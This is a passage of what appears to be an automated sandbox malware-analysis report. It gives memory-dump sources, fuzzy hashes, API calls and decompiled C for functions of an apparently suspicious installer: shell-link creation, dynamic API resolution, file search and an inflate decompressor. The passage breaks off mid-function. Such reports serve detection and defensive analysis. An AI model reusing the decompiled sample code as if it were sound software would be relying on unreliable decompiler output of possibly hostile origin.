                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ErrorFindMode$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2885216544-0
                                                                      • Opcode ID: 055ceda7cfb7593c2ca12c0ec91b25e43900224e0777ef4bda6e37e64f0dcbc7
                                                                      • Instruction ID: 3d4d6c253e85b88ebba290a8a0e03fa066f01ceea9dc36e60308c04f6099b6be
                                                                      • Opcode Fuzzy Hash: 055ceda7cfb7593c2ca12c0ec91b25e43900224e0777ef4bda6e37e64f0dcbc7
                                                                      • Instruction Fuzzy Hash: F4E0CD32B486206BD20027B56E88D1B3A5CDFC5721F144133B200F62D0C5B55C018BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E004020A3() {
                                                                      				void* _t44;
                                                                      				intOrPtr* _t48;
                                                                      				intOrPtr* _t50;
                                                                      				intOrPtr* _t52;
                                                                      				intOrPtr* _t54;
                                                                      				signed int _t58;
                                                                      				intOrPtr* _t59;
                                                                      				intOrPtr* _t62;
                                                                      				intOrPtr* _t64;
                                                                      				intOrPtr* _t66;
                                                                      				intOrPtr* _t69;
                                                                      				intOrPtr* _t71;
                                                                      				int _t75;
                                                                      				signed int _t81;
                                                                      				intOrPtr* _t88;
                                                                      				void* _t95;
                                                                      				void* _t96;
                                                                      				void* _t100;
                                                                      
                                                                      				 *(_t100 - 0x30) = E00402A9D(0xfffffff0);
                                                                      				_t96 = E00402A9D(0xffffffdf);
                                                                      				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9D(2);
                                                                      				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9D(0xffffffcd);
                                                                      				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9D(0x45);
                                                                      				if(E00405509(_t96) == 0) {
                                                                      					E00402A9D(0x21);
                                                                      				}
                                                                      				_t44 = _t100 + 8;
                                                                      				__imp__CoCreateInstance(0x407428, _t75, 1, 0x407418, _t44);
                                                                      				if(_t44 < _t75) {
                                                                      					L12:
                                                                      					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                      					_push(0xfffffff0);
                                                                      				} else {
                                                                      					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                      					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407438, _t100 - 8);
                                                                      					if(_t95 >= _t75) {
                                                                      						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                      						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                      						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                      						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                      						_t81 =  *(_t100 - 0x14);
                                                                      						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                      						if(_t58 != 0) {
                                                                      							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                      							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                      							_t81 =  *(_t100 - 0x14);
                                                                      						}
                                                                      						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                      						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                      						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                                                      							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                      							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                                                      						}
                                                                      						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                      						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                      						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                      						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                      						if(_t95 >= _t75) {
                                                                      							 *0x4093e0 = _t75;
                                                                      							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x4093e0, 0x400);
                                                                      							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                      							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x4093e0, 1);
                                                                      						}
                                                                      						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                      						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                      					}
                                                                      					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                      					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                      					if(_t95 >= _t75) {
                                                                      						_push(0xfffffff4);
                                                                      					} else {
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      				E00401428();
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t100 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407428,?,00000001,00407418,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F6
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,004093E0,00000400,?,00000001,00407418,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B2
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040212E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 123533781-501415292
                                                                      • Opcode ID: c6f65dcf336bb5dd551021bf91646b932be3072b4551db8ca50a3f1fa06c84dd
                                                                      • Instruction ID: 3ed110bf0786c02e8884ace9c02211f00dfd8f88c36098b7f48f2011d4953916
                                                                      • Opcode Fuzzy Hash: c6f65dcf336bb5dd551021bf91646b932be3072b4551db8ca50a3f1fa06c84dd
                                                                      • Instruction Fuzzy Hash: FB417F75A00215BFCB00EFA4CD88E9D7BBAEF48354B20456AF905EB2D1CB759D41CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405CAA(CHAR* _a4, CHAR* _a8) {
                                                                      				struct HINSTANCE__* _t4;
                                                                      
                                                                      				_t4 = GetModuleHandleA(_a4);
                                                                      				if(_t4 != 0) {
                                                                      					L2:
                                                                      					return GetProcAddress(_t4, _a8);
                                                                      				}
                                                                      				_t4 = LoadLibraryA(_a4);
                                                                      				if(_t4 != 0) {
                                                                      					goto L2;
                                                                      				}
                                                                      				return _t4;
                                                                      			}


                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(000000F1,0040570A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CAE
                                                                      • LoadLibraryA.KERNEL32(000000F1,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CBC
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                      • String ID:
                                                                      • API String ID: 310444273-0
                                                                      • Opcode ID: e4b61fa6f5159826fb47f49255b6dc6a3715f4bc3db61b7d7797ec1f11eff99d
                                                                      • Instruction ID: 33d1b8fa5dc3d2f461b27e07447732d314f4b7f1c5b6ea1df08c89d6f7ec294a
                                                                      • Opcode Fuzzy Hash: e4b61fa6f5159826fb47f49255b6dc6a3715f4bc3db61b7d7797ec1f11eff99d
                                                                      • Instruction Fuzzy Hash: 47D09230A0C301ABDB111F20DF0990B7AA9AB90781B044839B045E52B0D735D850EA2A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 39%
                                                                      			E004026B9(char __ebx, char* __edi, char* __esi) {
                                                                      				void* _t19;
                                                                      
                                                                      				if(FindFirstFileA(E00402A9D(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                      					E00405902(__edi, _t6);
                                                                      					_push(_t19 - 0x178);
                                                                      					_push(__esi);
                                                                      					E004059A4();
                                                                      				} else {
                                                                      					 *__edi = __ebx;
                                                                      					 *__esi = __ebx;
                                                                      					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t19 - 4));
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 0624d6b46ab18f0b9b7ad3cd879cd3c4943d2122b08aabc274a81147faaa1269
                                                                      • Instruction ID: 48b8645060a309c8c5223ed75caab456a314ca5961bde3a44afc719425e93c56
                                                                      • Opcode Fuzzy Hash: 0624d6b46ab18f0b9b7ad3cd879cd3c4943d2122b08aabc274a81147faaa1269
                                                                      • Instruction Fuzzy Hash: B2F0A772A45110DEDB00E7A49D499FE7768DF21324F60457BE141F21C1C6B84945DA6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E00406095(signed int __ebx, signed int* __esi) {
                                                                      				signed int _t396;
                                                                      				signed int _t425;
                                                                      				signed int _t442;
                                                                      				signed int _t443;
                                                                      				signed int* _t446;
                                                                      				void* _t448;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					_t446 = __esi;
                                                                      					_t425 = __ebx;
                                                                      					if( *(_t448 - 0x34) == 0) {
                                                                      						break;
                                                                      					}
                                                                      					L55:
                                                                      					__eax =  *(__ebp - 0x38);
                                                                      					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      					__ecx = __ebx;
                                                                      					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      					__ebx = __ebx + 8;
                                                                      					while(1) {
                                                                      						L56:
                                                                      						if(__ebx < 0xe) {
                                                                      							goto L0;
                                                                      						}
                                                                      						L57:
                                                                      						__eax =  *(__ebp - 0x40);
                                                                      						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                      						__ecx = __eax;
                                                                      						__esi[1] = __eax;
                                                                      						__ecx = __eax & 0x0000001f;
                                                                      						if(__cl > 0x1d) {
                                                                      							L9:
                                                                      							_t443 = _t442 | 0xffffffff;
                                                                      							 *_t446 = 0x11;
                                                                      							L10:
                                                                      							_t446[0x147] =  *(_t448 - 0x40);
                                                                      							_t446[0x146] = _t425;
                                                                      							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                      							L11:
                                                                      							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                      							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                      							E00406804( *(_t448 + 8));
                                                                      							return _t443;
                                                                      						}
                                                                      						L58:
                                                                      						__eax = __eax & 0x000003e0;
                                                                      						if(__eax > 0x3a0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						L59:
                                                                      						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                      						__ebx = __ebx - 0xe;
                                                                      						_t94 =  &(__esi[2]);
                                                                      						 *_t94 = __esi[2] & 0x00000000;
                                                                      						 *__esi = 0xc;
                                                                      						while(1) {
                                                                      							L60:
                                                                      							__esi[1] = __esi[1] >> 0xa;
                                                                      							__eax = (__esi[1] >> 0xa) + 4;
                                                                      							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                      								goto L68;
                                                                      							}
                                                                      							L61:
                                                                      							while(1) {
                                                                      								L64:
                                                                      								if(__ebx >= 3) {
                                                                      									break;
                                                                      								}
                                                                      								L62:
                                                                      								if( *(__ebp - 0x34) == 0) {
                                                                      									goto L182;
                                                                      								}
                                                                      								L63:
                                                                      								__eax =  *(__ebp - 0x38);
                                                                      								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      								__ecx = __ebx;
                                                                      								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      								__ebx = __ebx + 8;
                                                                      							}
                                                                      							L65:
                                                                      							__ecx = __esi[2];
                                                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                      							__ebx = __ebx - 3;
                                                                      							_t108 = __ecx + 0x40730c; // 0x121110
                                                                      							__ecx =  *_t108;
                                                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                      							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                      							__ecx = __esi[1];
                                                                      							__esi[2] = __esi[2] + 1;
                                                                      							__eax = __esi[2];
                                                                      							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                      							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                      								goto L64;
                                                                      							}
                                                                      							L66:
                                                                      							while(1) {
                                                                      								L68:
                                                                      								if(__esi[2] >= 0x13) {
                                                                      									break;
                                                                      								}
                                                                      								L67:
                                                                      								_t119 = __esi[2] + 0x40730c; // 0x4000300
                                                                      								__eax =  *_t119;
                                                                      								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                      								_t126 =  &(__esi[2]);
                                                                      								 *_t126 = __esi[2] + 1;
                                                                      							}
                                                                      							L69:
                                                                      							__ecx = __ebp - 8;
                                                                      							__edi =  &(__esi[0x143]);
                                                                      							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                      							__eax = 0;
                                                                      							 *(__ebp - 8) = 0;
                                                                      							__eax =  &(__esi[3]);
                                                                      							 *__edi = 7;
                                                                      							__eax = E0040686C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                      							if(__eax != 0) {
                                                                      								L72:
                                                                      								 *__esi = 0x11;
                                                                      								while(1) {
                                                                      									L180:
                                                                      									_t396 =  *_t446;
                                                                      									if(_t396 > 0xf) {
                                                                      										break;
                                                                      									}
                                                                      									L1:
                                                                      									switch( *((intOrPtr*)(_t396 * 4 +  &M004067C4))) {
                                                                      										case 0:
                                                                      											L101:
                                                                      											__eax = __esi[4] & 0x000000ff;
                                                                      											__esi[3] = __esi[4] & 0x000000ff;
                                                                      											__eax = __esi[5];
                                                                      											__esi[2] = __esi[5];
                                                                      											 *__esi = 1;
                                                                      											goto L102;
                                                                      										case 1:
                                                                      											L102:
                                                                      											__eax = __esi[3];
                                                                      											while(1) {
                                                                      												L105:
                                                                      												__eflags = __ebx - __eax;
                                                                      												if(__ebx >= __eax) {
                                                                      													break;
                                                                      												}
                                                                      												L103:
                                                                      												__eflags =  *(__ebp - 0x34);
                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                      													goto L182;
                                                                      												}
                                                                      												L104:
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                      												__ecx = __ebx;
                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      												__ebx = __ebx + 8;
                                                                      												__eflags = __ebx;
                                                                      											}
                                                                      											L106:
                                                                      											__eax =  *(0x4093b0 + __eax * 2) & 0x0000ffff;
                                                                      											__eax = __eax &  *(__ebp - 0x40);
                                                                      											__ecx = __esi[2];
                                                                      											__eax = __esi[2] + __eax * 4;
                                                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                      											__ecx =  *__eax & 0x000000ff;
                                                                      											__eflags = __ecx;
                                                                      											if(__ecx != 0) {
                                                                      												L108:
                                                                      												__eflags = __cl & 0x00000010;
                                                                      												if((__cl & 0x00000010) == 0) {
                                                                      													L110:
                                                                      													__eflags = __cl & 0x00000040;
                                                                      													if((__cl & 0x00000040) == 0) {
                                                                      														goto L125;
                                                                      													}
                                                                      													L111:
                                                                      													__eflags = __cl & 0x00000020;
                                                                      													if((__cl & 0x00000020) == 0) {
                                                                      														goto L9;
                                                                      													}
                                                                      													L112:
                                                                      													 *__esi = 7;
                                                                      													goto L180;
                                                                      												}
                                                                      												L109:
                                                                      												__esi[2] = __ecx;
                                                                      												__esi[1] = __eax;
                                                                      												 *__esi = 2;
                                                                      												goto L180;
                                                                      											}
                                                                      											L107:
                                                                      											__esi[2] = __eax;
                                                                      											 *__esi = 6;
                                                                      											goto L180;
                                                                      										case 2:
                                                                      											L113:
                                                                      											__eax = __esi[2];
                                                                      											while(1) {
                                                                      												L116:
                                                                      												__eflags = __ebx - __eax;
                                                                      												if(__ebx >= __eax) {
                                                                      													break;
                                                                      												}
                                                                      												L114:
                                                                      												__eflags =  *(__ebp - 0x34);
                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                      													goto L182;
                                                                      												}
                                                                      												L115:
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                      												__ecx = __ebx;
                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      												__ebx = __ebx + 8;
                                                                      												__eflags = __ebx;
                                                                      											}
                                                                      											L117:
                                                                      											 *(0x4093b0 + __eax * 2) & 0x0000ffff =  *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                      											__esi[1] = __esi[1] + ( *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                      											__ecx = __eax;
                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      											__ebx = __ebx - __eax;
                                                                      											__eflags = __ebx;
                                                                      											__eax = __esi[4] & 0x000000ff;
                                                                      											__esi[3] = __esi[4] & 0x000000ff;
                                                                      											__eax = __esi[6];
                                                                      											__esi[2] = __esi[6];
                                                                      											 *__esi = 3;
                                                                      											goto L118;
                                                                      										case 3:
                                                                      											L118:
                                                                      											__eax = __esi[3];
                                                                      											while(1) {
                                                                      												L121:
                                                                      												__eflags = __ebx - __eax;
                                                                      												if(__ebx >= __eax) {
                                                                      													break;
                                                                      												}
                                                                      												L119:
                                                                      												__eflags =  *(__ebp - 0x34);
                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                      													goto L182;
                                                                      												}
                                                                      												L120:
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                      												__ecx = __ebx;
                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      												__ebx = __ebx + 8;
                                                                      												__eflags = __ebx;
                                                                      											}
                                                                      											L122:
                                                                      											__eax =  *(0x4093b0 + __eax * 2) & 0x0000ffff;
                                                                      											__eax = __eax &  *(__ebp - 0x40);
                                                                      											__ecx = __esi[2];
                                                                      											__eax = __esi[2] + __eax * 4;
                                                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                      											__ecx =  *__eax & 0x000000ff;
                                                                      											__eflags = __cl & 0x00000010;
                                                                      											if((__cl & 0x00000010) == 0) {
                                                                      												L124:
                                                                      												__eflags = __cl & 0x00000040;
                                                                      												if((__cl & 0x00000040) != 0) {
                                                                      													goto L9;
                                                                      												}
                                                                      												L125:
                                                                      												__esi[3] = __ecx;
                                                                      												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                      												__esi[2] = __eax;
                                                                      												goto L180;
                                                                      											}
                                                                      											L123:
                                                                      											__esi[2] = __ecx;
                                                                      											__esi[3] = __eax;
                                                                      											 *__esi = 4;
                                                                      											goto L180;
                                                                      										case 4:
                                                                      											L126:
                                                                      											__eax = __esi[2];
                                                                      											while(1) {
                                                                      												L129:
                                                                      												__eflags = __ebx - __eax;
                                                                      												if(__ebx >= __eax) {
                                                                      													break;
                                                                      												}
                                                                      												L127:
                                                                      												__eflags =  *(__ebp - 0x34);
                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                      													goto L182;
                                                                      												}
                                                                      												L128:
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                      												__ecx = __ebx;
                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      												__ebx = __ebx + 8;
                                                                      												__eflags = __ebx;
                                                                      											}
                                                                      											L130:
                                                                      											 *(0x4093b0 + __eax * 2) & 0x0000ffff =  *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                      											__esi[3] = __esi[3] + ( *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                      											__ecx = __eax;
                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      											__ebx = __ebx - __eax;
                                                                      											__eflags = __ebx;
                                                                      											 *__esi = 5;
                                                                      											goto L131;
                                                                      										case 5:
                                                                      											L131:
                                                                      											__eax =  *(__ebp - 0x30);
                                                                      											__edx = __esi[3];
                                                                      											__eax = __eax - __esi;
                                                                      											__ecx = __eax - __esi - 0x1ba0;
                                                                      											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                      											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                      												__ecx = __eax;
                                                                      												__ecx = __eax - __edx;
                                                                      												__eflags = __ecx;
                                                                      											} else {
                                                                      												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                      												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                      												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                      											}
                                                                      											__eflags = __esi[1];
                                                                      											 *(__ebp - 0x20) = __ecx;
                                                                      											if(__esi[1] != 0) {
                                                                      												L135:
                                                                      												__edi =  *(__ebp - 0x2c);
                                                                      												do {
                                                                      													L136:
                                                                      													__eflags = __edi;
                                                                      													if(__edi != 0) {
                                                                      														goto L152;
                                                                      													}
                                                                      													L137:
                                                                      													__edi = __esi[0x26e8];
                                                                      													__eflags = __eax - __edi;
                                                                      													if(__eax != __edi) {
                                                                      														L143:
                                                                      														__esi[0x26ea] = __eax;
                                                                      														__eax = E00406804( *((intOrPtr*)(__ebp + 8)));
                                                                      														__eax = __esi[0x26ea];
                                                                      														__ecx = __esi[0x26e9];
                                                                      														__eflags = __eax - __ecx;
                                                                      														 *(__ebp - 0x30) = __eax;
                                                                      														if(__eax >= __ecx) {
                                                                      															__edi = __esi[0x26e8];
                                                                      															__edi = __esi[0x26e8] - __eax;
                                                                      															__eflags = __edi;
                                                                      														} else {
                                                                      															__ecx = __ecx - __eax;
                                                                      															__edi = __ecx - __eax - 1;
                                                                      														}
                                                                      														__edx = __esi[0x26e8];
                                                                      														__eflags = __eax - __edx;
                                                                      														 *(__ebp - 8) = __edx;
                                                                      														if(__eax == __edx) {
                                                                      															__edx =  &(__esi[0x6e8]);
                                                                      															__eflags = __ecx - __edx;
                                                                      															if(__ecx != __edx) {
                                                                      																__eax = __edx;
                                                                      																__eflags = __eax - __ecx;
                                                                      																 *(__ebp - 0x30) = __eax;
                                                                      																if(__eax >= __ecx) {
                                                                      																	__edi =  *(__ebp - 8);
                                                                      																	__edi =  *(__ebp - 8) - __eax;
                                                                      																	__eflags = __edi;
                                                                      																} else {
                                                                      																	__ecx = __ecx - __eax;
                                                                      																	__edi = __ecx;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      														__eflags = __edi;
                                                                      														if(__edi == 0) {
                                                                      															goto L183;
                                                                      														} else {
                                                                      															goto L152;
                                                                      														}
                                                                      													}
                                                                      													L138:
                                                                      													__ecx = __esi[0x26e9];
                                                                      													__edx =  &(__esi[0x6e8]);
                                                                      													__eflags = __ecx - __edx;
                                                                      													if(__ecx == __edx) {
                                                                      														goto L143;
                                                                      													}
                                                                      													L139:
                                                                      													__eax = __edx;
                                                                      													__eflags = __eax - __ecx;
                                                                      													if(__eax >= __ecx) {
                                                                      														__edi = __edi - __eax;
                                                                      														__eflags = __edi;
                                                                      													} else {
                                                                      														__ecx = __ecx - __eax;
                                                                      														__edi = __ecx;
                                                                      													}
                                                                      													__eflags = __edi;
                                                                      													if(__edi == 0) {
                                                                      														goto L143;
                                                                      													}
                                                                      													L152:
                                                                      													__ecx =  *(__ebp - 0x20);
                                                                      													 *__eax =  *__ecx;
                                                                      													__eax = __eax + 1;
                                                                      													__ecx = __ecx + 1;
                                                                      													__edi = __edi - 1;
                                                                      													__eflags = __ecx - __esi[0x26e8];
                                                                      													 *(__ebp - 0x30) = __eax;
                                                                      													 *(__ebp - 0x20) = __ecx;
                                                                      													 *(__ebp - 0x2c) = __edi;
                                                                      													if(__ecx == __esi[0x26e8]) {
                                                                      														__ecx =  &(__esi[0x6e8]);
                                                                      														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                      													}
                                                                      													_t357 =  &(__esi[1]);
                                                                      													 *_t357 = __esi[1] - 1;
                                                                      													__eflags =  *_t357;
                                                                      												} while ( *_t357 != 0);
                                                                      											}
                                                                      											goto L23;
                                                                      										case 6:
                                                                      											L156:
                                                                      											__eax =  *(__ebp - 0x2c);
                                                                      											__edi =  *(__ebp - 0x30);
                                                                      											__eflags = __eax;
                                                                      											if(__eax != 0) {
                                                                      												L172:
                                                                      												__cl = __esi[2];
                                                                      												 *__edi = __cl;
                                                                      												__edi = __edi + 1;
                                                                      												__eax = __eax - 1;
                                                                      												 *(__ebp - 0x30) = __edi;
                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                      												goto L23;
                                                                      											}
                                                                      											L157:
